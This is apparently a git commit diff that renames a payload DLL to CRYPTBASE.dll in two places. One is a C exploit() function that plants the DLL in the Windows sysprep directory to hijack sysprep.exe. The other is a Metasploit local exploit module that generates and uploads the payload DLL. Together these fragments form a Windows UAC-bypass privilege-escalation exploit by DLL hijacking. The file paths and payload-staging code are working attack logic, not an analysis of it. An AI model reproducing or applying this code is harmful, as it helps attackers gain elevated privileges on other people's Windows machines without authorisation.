Remove large file and rename payload.dll
parent
035e97523b
commit
ff5cf396ab
|
@ -5,7 +5,7 @@ void exploit()
|
|||
const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep";
|
||||
const wchar_t *szElevDll = L"CRYPTBASE.dll";
|
||||
const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
|
||||
const wchar_t *szSourceDll = L"payload.dll"; // Need some IPC to randomize this if possible
|
||||
const wchar_t *szSourceDll = L"CRYPTBASE.dll"; // Need some IPC to randomize this if possible
|
||||
const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
|
||||
const wchar_t *szElevArgs = L"";
|
||||
wchar_t path[MAX_PATH];
|
||||
|
|
Binary file not shown.
|
@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
payload = generate_payload_dll
|
||||
|
||||
|
||||
payload_filepath = "#{tmpdir}\\payload.dll"
|
||||
payload_filepath = "#{tmpdir}\\CRYPTBASE.dll"
|
||||
|
||||
|
||||
print_status("Uploading the Payload DLL to the filesystem...")
|
||||
|
|
Loading…
Reference in New Issue